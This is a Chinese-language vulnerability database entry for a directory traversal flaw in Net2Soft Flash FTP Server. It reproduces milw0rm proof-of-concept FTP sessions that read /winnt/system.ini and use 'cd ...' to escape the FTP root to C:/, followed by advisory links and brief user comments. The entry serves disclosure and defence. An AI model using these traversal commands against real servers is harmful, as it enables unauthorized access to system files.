|漏洞详情
Net2SoftFlashFTPServer是一款基于Windows的FTP服务程序。Net2SoftFlashFTPServer存在目录遍历问题,远程攻击者可以利用这个漏洞未授权访问系统信息。目前没有详细漏洞细节提供。
|漏洞EXP
TestCode:
C:>ftp localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (server:(none)): CoolICE
331 Password required for CoolICE.
Password:
230 User CoolICE logged in.
ftp> get /winnt/system.ini
200 Port command successful.
150 Opening data connection for /winnt/system.ini.
226 File sent ok
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec
ftp>
--------------------------
C:>ftp -d localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (Server:(none)): anonymous
---> USER anonymous
331 Password required for anonymous.
Password:
---> PASS [email protected]
230 User anonymous logged in.
ftp> pwd
---> XPWD
257 "/C:/inetpub/ftproot/" is current directory.
ftp> cd /
---> CWD /
501 CWD failed. No permission
---> CWD ..
501 CWD failed. No permission
ftp> cd ...
---> CWD ...
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.
ftp> cd /
---> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
---> XPWD
257 "/C:/" is current directory.
# milw0rm.com [2004-07-22]
|参考资料
来源:SECUNIA
名称:10522
链接:http://secunia.com/advisories/10522
来源:BID
名称:9350
链接:http://www.securityfocus.com/bid/9350
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5FP051FBPQ.html
来源:SECTRACK
名称:1008588
链接:http://securitytracker.com/id?1008588
来源:NSFOCUS
名称:5892
链接:http://www.nsfocus.net/vulndb/5892
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666